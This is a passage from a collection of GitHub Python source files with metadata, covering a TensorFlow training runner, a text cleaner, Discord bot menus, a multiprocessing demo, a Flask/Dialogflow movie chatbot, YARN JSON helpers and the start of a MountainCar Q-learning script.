params.runtime:\n optimizer = performance.configure_optimizer(\n optimizer,\n use_float16=params.runtime.mixed_precision_dtype == 'float16',\n loss_scale=params.runtime.loss_scale)\n return optimizer\n\n def _build_best_checkpoint_exporter(self):\n export_subdir = self._params.trainer.best_checkpoint_export_subdir\n metric_name = self._params.trainer.best_checkpoint_validation_metric\n metric_comp = self._params.trainer.best_checkpoint_metric_comp\n if self._model_dir and metric_name:\n if export_subdir:\n best_ckpt_dir = os.path.join(self._model_dir, export_subdir)\n else:\n best_ckpt_dir = self._model_dir\n best_ckpt_exporter = BestCheckpointExporter(\n best_ckpt_dir, metric_name, metric_comp)\n logging.info('Created the best checkpoint exporter. '\n 'model_dir: %s, export_subdir: %s, metric_name: %s',\n self._model_dir, export_subdir, metric_name)\n else:\n best_ckpt_exporter = None\n return best_ckpt_exporter\n\n def _maybe_build_checkpoint_manager(self):\n assert self._trainer is not None\n if self._trainer.checkpoint:\n if self._model_dir is None:\n raise ValueError('model_dir must be specified, but got None.')\n checkpoint_manager = tf.train.CheckpointManager(\n self._trainer.checkpoint,\n directory=self._model_dir,\n max_to_keep=self._params.trainer.max_to_keep,\n step_counter=self._trainer.global_step,\n checkpoint_interval=self._params.trainer.checkpoint_interval,\n init_fn=self._trainer.initialize)\n else:\n checkpoint_manager = None\n return checkpoint_manager\n\n @gin.configurable\n def _get_train_actions(self, params: ExperimentConfig,\n trainer: Trainer,\n model_dir: str,\n checkpoint_manager: tf.train.CheckpointManager):\n train_actions = []\n if hasattr(params.task, 'pruning') and params.task.pruning:\n train_actions.append(action.PruningAction(\n exprt_dir=model_dir,\n model=trainer.model,\n optimizer=trainer.optimizer))\n\n if params.trainer.recovery_max_trials >= 0:\n recovery_condition = action.RecoveryActionCondition(\n global_step=trainer.global_step,\n loss_upper_bound=params.trainer.loss_upper_bound,\n recovery_begin_steps=params.trainer.recovery_begin_steps,\n recovery_max_trials=params.trainer.recovery_max_trials)\n recovery_action = action.ConditionAction(\n condition=recovery_condition,\n action=action.RecoveryAction(checkpoint_manager))\n train_actions.append(recovery_action)\n return train_actions\n\n @gin.configurable\n def _get_validation_actions(self, params: ExperimentConfig, trainer: Trainer, model_dir: str):\n validation_actions = []\n if trainer is not None and isinstance(trainer.optimizer, ExponentialMovingAverage):\n validation_actions.append(action.EMACheckpointAction(\n export_dir=model_dir,\n optimizer=trainer.optimizer,\n checkpoint=trainer.checkpoint,\n max_to_keep=params.trainer.max_to_keep))\n return validation_actions\n\n def run(self):\n self._controller.boost(\n self._mode, self._params.trainer, self._run_post_validation)\n", "repo_name": "exogeny/rocket", "sub_path": "orbit/launch/runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 9282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 23, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.clip_by_global_norm", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 24, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.random.normal", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.shape", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "tensorflow.Tensor", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.distribute", "line_number": 45, "usage_type": "attribute"}, {"api_name": "orbit.launch.task.Task", "line_number": 46, "usage_type": "name"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 52, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 53, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 53, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Controller", "line_number": 54, "usage_type": "name"}, {"api_name": "tensorflow.distribute.get_strategy", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.distribute", "line_number": 55, "usage_type": "attribute"}, {"api_name": "orbit.launch.trainer.AbstractTrainer", "line_number": 79, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.AbstractValidator", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 82, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Action", "line_number": 83, "usage_type": "name"}, {"api_name": "orbit.launch.controller.Controller", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 115, "usage_type": "name"}, {"api_name": "orbit.launch.task.Task", "line_number": 116, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 119, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 119, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.Trainer", "line_number": 125, "usage_type": "call"}, {"api_name": "absl.logging.info", "line_number": 138, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 138, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 142, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 144, "usage_type": "call"}, {"api_name": "orbit.optimization.factory.OptimizerFactory", "line_number": 148, "usage_type": "call"}, {"api_name": "orbit.core.performance.configure_optimizer", "line_number": 156, "usage_type": "call"}, {"api_name": "orbit.core.performance", "line_number": 156, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "orbit.core.checkpoint.BestCheckpointExporter", "line_number": 171, "usage_type": "call"}, {"api_name": "absl.logging.info", "line_number": 173, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 173, "usage_type": "name"}, {"api_name": "tensorflow.train.CheckpointManager", "line_number": 185, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 185, "usage_type": "attribute"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 197, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.Trainer", "line_number": 198, "usage_type": "name"}, {"api_name": "tensorflow.train", "line_number": 200, "usage_type": "attribute"}, {"api_name": "orbit.launch.action.PruningAction", "line_number": 203, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 203, "usage_type": "name"}, {"api_name": "orbit.launch.action.RecoveryActionCondition", "line_number": 209, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 209, "usage_type": "name"}, {"api_name": "orbit.launch.action.ConditionAction", "line_number": 214, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 214, "usage_type": "name"}, {"api_name": "orbit.launch.action.RecoveryAction", "line_number": 216, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 216, "usage_type": "name"}, {"api_name": "gin.configurable", "line_number": 196, "usage_type": "attribute"}, {"api_name": "orbit.config.ExperimentConfig", "line_number": 221, "usage_type": "name"}, {"api_name": "orbit.launch.trainer.Trainer", "line_number": 221, "usage_type": "name"}, {"api_name": "orbit.optimization.ExponentialMovingAverage", "line_number": 223, "usage_type": "argument"}, {"api_name": "orbit.launch.action.EMACheckpointAction", "line_number": 224, "usage_type": "call"}, {"api_name": "orbit.launch.action", "line_number": 224, "usage_type": "name"}, {"api_name": "gin.configurable", "line_number": 220, "usage_type": "attribute"}]}
+{"seq_id": "8070646373", "text": "\nimport io\nimport re\nimport datetime\nclass TextCleaner:\n\n text = \"\"\n f_name = \"txt\"+datetime.datetime.now().strftime(\"%d-%m %H %M\")\n links_list =[]\n special_chars = []\n dates_list = []\n\n #TODO adding one list of removed chars, add deleted matches position(low priority)\n def read_file(self):\n try:\n f = io.open(self.f_name, \"r\", encoding=\"utf-8\")\n self.text = f.read()\n except FileNotFoundError:\n print(\"File Not Found\")\n else:\n f.close()\n\n def write_file(self):\n with io.open(self.f_name, \"w\", encoding=\"utf-8\") as f:\n f.write(self.text)\n f.close()\n\n # Clears binded wrods\n def clear_binded_words(self):\n\n # Function for detecting binded words 'XXYy' splitting them\n\n def clean_XXYy():\n re_pattern_split = '(([A-Z]+([a-z])))'\n re_matches_split = re.findall(re_pattern_split, self.text)\n for match in re_matches_split:\n if match[0].__len__() > 2:\n fixed_match = match[0][:-2] + \" \" + match[0][-2:]\n self.text = self.text.replace(match[0], fixed_match)\n\n # pattern for detecting binded words 'xxYy' splitting them\n\n def clean_xxYy():\n re_pattern_split = '(([a-z])+([A-Z]))'\n re_matches_split = re.findall(re_pattern_split, self.text)\n for match in re_matches_split:\n fixed_match = match[0][:-1] + \" \" + match[0][-1]\n self.text = self.text.replace(match[0], fixed_match)\n\n clean_XXYy()\n clean_xxYy()\n\n # Clears links\n def clear_links(self):\n # pattern for main site names\n re_pattern = '(http|ftp|https)\\:\\/\\/([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?'\n re_match = re.findall(re_pattern, self.text)\n for match in re_match:\n match_str = ''.join(match[0]) + '://'\n match_str += ''.join(match[1])\n match_str += ''.join(match[2])\n self.text = self.text.replace(match_str, \" \")\n self.links_list.append(match_str)\n\n # Clears special chars\n\n def find_special_chars(self):\n\n # Finding special characters\n\n for char in self.text:\n if not char.isalnum() and not char.isspace():\n if not char in self.special_chars:\n self.special_chars.append(char)\n else:\n pass\n\n # Find dates using regex\n\n def clear_dates(self):\n\n re_pattern_date = '(([0-9]{2,4})(\\/|\\-|\\s)([0-9]{1,2})(\\/|\\-|\\s)([0-9]{1,4}))'\n re_match = re.findall(re_pattern_date, self.text)\n\n for match in re_match:\n self.dates_list.append(match[0])\n self.text = self.text.replace(match[0], \" \")\n\n # Clears special characters\n\n def clear_special_char(self):\n for char in self.text:\n if char in self.special_chars:\n self.text = self.text.replace(char, \" \")\n\n def clear_special_char_no_punctuation(self):\n for char in self.text:\n if char in self.special_chars and not (char=='.' or char==',' or char=='/'):\n self.text= self.text.replace(char,\" \")\n # Clears digitis\n\n def clear_digits(self):\n for char in self.text:\n if char.isdigit():\n self.text = self.text.replace(char, \" \")\n\n # Clears multispace\n\n def clear_multispace(self):\n self.text = ' '.join(self.text.split())\n\n # text words to list\n # return words_list\n\n def text_to_list(self):\n words= self.text.split()\n return words\n\n def lower_text(self):\n self.text = self.text.lower()\n\n def clear_text(self):\n self.clear_binded_words()\n self.clear_links()\n self.find_special_chars()\n self.clear_dates()\n self.clear_special_char()\n self.clear_digits()\n self.clear_multispace()\n self.lower_text()\n\n def clear_text_base(self):\n self.clear_binded_words()\n self.clear_links()\n self.find_special_chars()\n self.clear_dates()\n self.clear_digits()\n self.clear_multispace()\n\n\n def get_text(self):\n return self.text\n def get_trash(self):\n trash = [self.links_list,self.special_chars,self.dates_list]\n return trash\n def __init__(self, file_name=None,txt=None):\n\n if file_name is not None:\n self.f_name=file_name\n\n if txt is None:\n self.read_file()\n else:\n self.text =txt\n\ndef main():\n pass\n\nif __name__==\"__main__\":\n main()", "repo_name": "45tooclose/python-new", "sub_path": "classes/TextCleaner.py", "file_name": "TextCleaner.py", "file_ext": "py", "file_size_in_byte": 4632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "io.open", "line_number": 16, "usage_type": "call"}, {"api_name": "io.open", "line_number": 24, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 35, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 45, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "43590283131", "text": "# -*- coding: utf-8 -*-\n\nimport time\nimport logging\nimport logging.config\nfrom concurrent_log_handler import ConcurrentRotatingFileHandler\n\nlogging.config.fileConfig('logging.conf')\n\nlogger = logging.getLogger(__file__)\n\ndef test():\n i = 1\n while True:\n print(f'{i}')\n logger.error(i)\n i += 1\n time.sleep(5)\n\nif __name__ == '__main__':\n test()", "repo_name": "Sunny-wong/python-supervisor-win", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.config.fileConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "26105848037", "text": "from __future__ import annotations\n\nfrom typing import List, Union, Iterable, Tuple\n\nimport discord\n\nfrom redbot.core.i18n import Translator\nfrom redbot.core.utils.chat_formatting import humanize_number, escape\nfrom redbot.core.utils._dpy_menus_utils import SimpleHybridMenu\nfrom redbot.vendored.discord.ext import menus\n\n_ = Translator(\"CustomCommands\", __file__)\n\n\nclass CCListSource(menus.ListPageSource):\n def __init__(self, custom_commands: Iterable[Tuple[str, dict]]):\n super().__init__(custom_commands, per_page=5)\n\n async def format_page(\n self, menu: SimpleHybridMenu, entries: Iterable[Tuple[str, dict]]\n ) -> Union[discord.Embed, str]:\n current_entry = menu.current_page + 1\n total_entries = self._max_pages\n\n results = []\n for command, body in entries:\n responses = body[\"response\"]\n\n if isinstance(responses, list):\n result = \", \".join(map(discord.utils.escape_markdown, responses))\n elif isinstance(responses, str):\n result = discord.utils.escape_markdown(responses)\n else:\n continue\n # Cut preview to 52 characters max\n if len(result) > 52:\n result = result[:49] + \"...\"\n # Replace newlines with spaces\n result = result.replace(\"\\n\", \" \")\n # Escape markdown and mass mentions\n result = escape(result, formatting=True, mass_mentions=True)\n results.append((f\"{menu.ctx.clean_prefix}{command}\", result))\n\n if await menu.ctx.embed_requested():\n # We need a space before the newline incase the CC preview ends in link (GH-2295)\n content = \" \\n\".join(map(\"**{0[0]}** : {0[1]}\".format, results))\n embed = discord.Embed(\n title=_(\"Custom Command List\"),\n description=content,\n colour=await menu.ctx.embed_colour(),\n )\n if total_entries > 1:\n text = _(\"Page: {page_num}/{total_pages}\\n\").format(\n page_num=humanize_number(current_entry),\n total_pages=humanize_number(max(1, total_entries)),\n )\n embed.set_footer(text=text)\n return embed\n else:\n return \"\\n\".join(map(\"{0[0]:<12} : {0[1]}\".format, results))\n\n\nclass CCRawSource(menus.ListPageSource):\n def __init__(self, custom_commands: List[str]):\n super().__init__(custom_commands, per_page=1)\n\n async def format_page(self, menu: SimpleHybridMenu, entry: str) -> Union[discord.Embed, str]:\n raw = discord.utils.escape_markdown(entry)\n current_entry = menu.current_page + 1\n total_entries = self._max_pages\n if await menu.ctx.embed_requested():\n colour = await menu.ctx.embed_colour()\n if len(raw) > 2048:\n raw = f\"{raw[:2045]}...\"\n embed = discord.Embed(\n title=_(\"Response #{num}\").format(num=current_entry),\n description=raw,\n colour=colour,\n )\n if total_entries > 1:\n text = _(\"Page: {page_num}/{total_pages}\\n\").format(\n page_num=humanize_number(current_entry),\n total_pages=humanize_number(max(1, total_entries)),\n )\n embed.set_footer(text=text)\n return embed\n else:\n msg = _(\"Response #{num}/{total}:\\n{raw}\").format(\n num=humanize_number(current_entry),\n total=humanize_number(max(1, total_entries)),\n raw=raw,\n )\n if len(msg) > 2000:\n msg = f\"{msg[:1997]}...\"\n return msg\n", "repo_name": "Scuffed-Guard/Draper-Red-Edge", "sub_path": "redbot/cogs/customcom/menus.py", "file_name": "menus.py", "file_ext": "py", "file_size_in_byte": 3749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "32", "api": [{"api_name": "redbot.core.i18n.Translator", "line_number": 12, "usage_type": "call"}, {"api_name": "redbot.vendored.discord.ext.menus.ListPageSource", "line_number": 15, "usage_type": "attribute"}, {"api_name": "redbot.vendored.discord.ext.menus", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "redbot.core.utils._dpy_menus_utils.SimpleHybridMenu", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "discord.utils", "line_number": 30, "usage_type": "attribute"}, {"api_name": "discord.utils.escape_markdown", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 32, "usage_type": "attribute"}, {"api_name": "redbot.core.utils.chat_formatting.escape", "line_number": 41, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 47, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 54, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 55, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 21, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 21, "usage_type": "attribute"}, {"api_name": "redbot.vendored.discord.ext.menus.ListPageSource", "line_number": 63, "usage_type": "attribute"}, {"api_name": "redbot.vendored.discord.ext.menus", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "redbot.core.utils._dpy_menus_utils.SimpleHybridMenu", "line_number": 67, "usage_type": "name"}, {"api_name": "discord.utils.escape_markdown", "line_number": 68, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 68, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 75, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 82, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 83, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 89, "usage_type": "call"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 90, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 67, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 67, "usage_type": "attribute"}]}
+{"seq_id": "30721325992", "text": "# 进程间通信有两种方式,队列和管道,Queue用于多个进程间实现通信,Pipe是两个进程的通信\n# 进程间的队列\n# 每个进程在内存中都是独立的一块空间,不像线程那样可以共享数据,所以只能由父进程通过传参的方式把队列传给子进程\n\n\nimport multiprocessing\nfrom multiprocessing import Queue\n\n\ndef foo(q):\n q.put([12, 'hello', True])\n\n\nif __name__ == '__main__':\n q = Queue() # 创建进程队列\n\n # 创建一个子进程\n p = multiprocessing.Process(target=foo, args=(q,))\n # 通过传参的方式把这个队列对象传给父进程\n p.start()\n\n print(q.get())\n", "repo_name": "nwmsno1/Python-Base", "sub_path": "basic/Multiprocessing/multipro_queue.py", "file_name": "multipro_queue.py", "file_ext": "py", "file_size_in_byte": 660, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "multiprocessing.Queue", "line_number": 15, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "71560042009", "text": "import os\nimport dialogflow\nimport requests\nimport json\nimport pusher\n\nfrom flask import Flask, request, jsonify, render_template\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\n# initialize Pusher\npusher_client = pusher.Pusher(\n\tapp_id=os.getenv('PUSHER_APP_ID'),\n\tkey=os.getenv('PUSHER_APP_KEY'),\n\tsecret=os.getenv('PUSHER_APP_SECRET'),\n\tcluster=os.getenv('PUSHER_APP_CLUSTER'),\n\tssl=True)\n\t\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n\n@app.route('/get-movie-detail', methods=['POST'])\ndef get_movie_detail():\n\tdata = request.get_json(silent=True)\n\tmovie = data['queryResult']['parameters']['movie']\n\tapi_key = os.getenv('OMDB_API_KEY')\n\n\tmovie_detail = requests.get('http://www.omdbapi.com/?t={0}&apikey={1}'.format(movie, api_key)).content\n\tmovie_detail = json.loads(movie_detail)\n\tresponse = \"\"\"\n\t\tTitle : {0}\n\t\tReleased: {1}\n\t\tActors: {2}\n\t\tPlot: {3}\n\t\"\"\".format(movie_detail['Title'], movie_detail['Released'], movie_detail['Actors'], movie_detail['Plot'])\n\n\treply = {\n\t\t'fulfillmentText': response\n\t}\n\n\treturn jsonify(reply)\n\n\ndef detect_intent_texts(project_id, session_id, text, language_code):\n\tsession_client = dialogflow.SessionsClient()\n\tsession = session_client.session_path(project_id, session_id)\n\t\n\tif text:\n\t\ttext_input = dialogflow.types.TextInput(\n\t\t\ttext=text, language_code=language_code)\n\t\tquery_input = dialogflow.types.QueryInput(text=text_input)\n\t\tresponse = session_client.detect_intent(\n\t\t\tsession=session, query_input=query_input)\n\n\t\treturn response.query_result.fulfillment_text\n\n\n@app.route('/send_message', methods=['POST'])\ndef send_message():\n\tmessage = request.form['message']\n\tproject_id = os.getenv('DIALOGFLOW_PROJECT_ID')\n\tfulfillment_text = detect_intent_texts(project_id, \"unique\", message, 'en')\n\tresponse_text = {\"message\": fulfillment_text}\n\t# socketId = request.form['socketId']\n\t# pusher_client.trigger('movie_bot', 'new_message',\n\t# \t{'human_message': message, 'bot_message': fulfillment_text},\n\t# \tsocketId)\n\n\treturn jsonify(response_text)\n\n\nif __name__ == '__main__':\n\tapp.run()\n", "repo_name": "Alexmhack/flask_chatbot", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 2102, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "dotenv.find_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "pusher.Pusher", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 46, "usage_type": "call"}, {"api_name": "dialogflow.SessionsClient", "line_number": 50, "usage_type": "call"}, {"api_name": "dialogflow.types.TextInput", "line_number": 54, "usage_type": "call"}, {"api_name": "dialogflow.types", "line_number": 54, "usage_type": "attribute"}, {"api_name": "dialogflow.types.QueryInput", "line_number": 56, "usage_type": "call"}, {"api_name": "dialogflow.types", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "10949957799", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by wind on 2021/4/21\n\nimport requests\nimport json\nimport time\n\n\nclass Utils:\n '''\n @staticmethod\n def fetchJsonToList(url, root, subitem):\n\n response = requests.get(url)\n\n try:\n json_items = json.loads(response.text)\n return json_items[root][subitem]\n\n except Exception,ex:\n items = []\n\n return items\n '''\n\n @staticmethod\n def fetchJsonToListItems(url, root, subitem):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n return json_items[root][subitem]\n except Exception as ex:\n items = []\n return items\n\n @staticmethod\n def fetchJsonItems(url, root, subitem):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n items = json_items[root][subitem]\n except Exception as ex:\n items = []\n return items\n\n @staticmethod\n def fetchJsonKvItems(url, root):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n items = json_items[root]\n except Exception as ex:\n items = {}\n return items\n\n @staticmethod\n def fetchJsonToList(url):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n items = json_items\n except Exception as ex:\n items = []\n return items\n\n @staticmethod\n def fetchRMJsonKvItems(url, root, key, value):\n result = {}\n response = requests.get(url)\n text = json.loads(response.text)\n items = text[root]\n for item in items:\n if (item.has_key(\"modelerType\")):\n if (item[\"modelerType\"].find(\"user\") != -1): continue\n if item.has_key(key) and item.has_key(value):\n result[item[key]] = item[value]\n return result\n\n @staticmethod\n def fetchJsonKvsItems(url, root, key, value):\n result = {}\n response = requests.get(url)\n text = json.loads(response.text)\n items = text[root]\n for item in items:\n if (item.has_key(\"modelerType\")):\n if (item[\"modelerType\"].find(\"user\") != -1): continue\n if item.has_key(key):\n result[item[key]] = [item[i] for i in value.split(\",\")]\n return result\n\n @staticmethod\n def timeToDatetime(timestamp):\n t = time.localtime(timestamp)\n return time.strftime('%Y-%m-%d %H:%M:%S', t)\n\n @staticmethod\n def currentTimeToDatetime():\n t = time.localtime(time.time())\n return time.strftime('%Y-%m-%d %H:%M:%S', t)\n\n @staticmethod\n def getOrDefault(map, key, default):\n if map.has_key(key): return map[key]\n return default\n\n @staticmethod\n def getOrDefaultByList(list, key, value, default):\n for item in list:\n if item[key] == value: return item\n return default\n", "repo_name": "windgeek/bigdata_cus", "sub_path": "yarn_list_utils/Utils.py", "file_name": "Utils.py", "file_ext": "py", "file_size_in_byte": 3042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 59, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 83, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 84, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 95, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 96, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 100, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "4020028220", "text": "import gym, math, random\nimport numpy as np\n#env = gym.make('CartPole-v0')\nenv = gym.make('MountainCar-v0')\n#env = gym.make('Hopper-v1')\n#env = gym.make('MsPacman-v0')\n\n\nA_DIVS=100\nB_DIVS=100\n\n\naRange = ( -2, 2 ) #\nbRange = ( -.1, .1 ) #\n\n\nbrain = np.zeros( (A_DIVS,B_DIVS, 3) )\n#brain += 4.5\n\nobs = env.reset()\n\nLEFT = 0\nNOTHING = 1\nRIGHT = 2\n\ndiscount = .99999\n\nrunning_average_value = 0\n\ndef obs_to_index( _obs ):\n result = [ int((_obs[0]-aRange[0])/(aRange[1]-aRange[0])*A_DIVS + .5 ),\n int((_obs[1]-bRange[0])/(bRange[1]-bRange[0])*B_DIVS + .5 ),]\n\n result[0] = max(0,min(A_DIVS-1,result[0]))\n result[1] = max(0,min(B_DIVS-1,result[1]))\n\n\n return result\n\nsteps_till_crash = 0\nrun_number = 0\n\n\ncount_out = 0\n\nwhile True:\n\n \n epsilon = 1.0/((run_number+1)/1)\n\n indexes = obs_to_index( obs )\n\n left_value = brain[ indexes[0], indexes[1], LEFT ]\n no_value = brain[ indexes[0], indexes[1], NOTHING ]\n right_value = brain[ indexes[0], indexes[1], RIGHT ]\n\n\n if random.random() > epsilon:\n best_value = left_value\n picked_direction = LEFT\n if no_value > best_value:\n picked_direction = NOTHING\n best_value = no_value\n if right_value > best_value:\n picked_direction = RIGHT\n best_value = right_value\n\n else:\n picked_direction = random.choice( [LEFT,NOTHING,RIGHT])\n\n #if picked_direction == LEFT:\n # print( \"vl:\" + str(left_value), end=' ' )\n # else:\n # print( \"vr:\" + str(right_value), 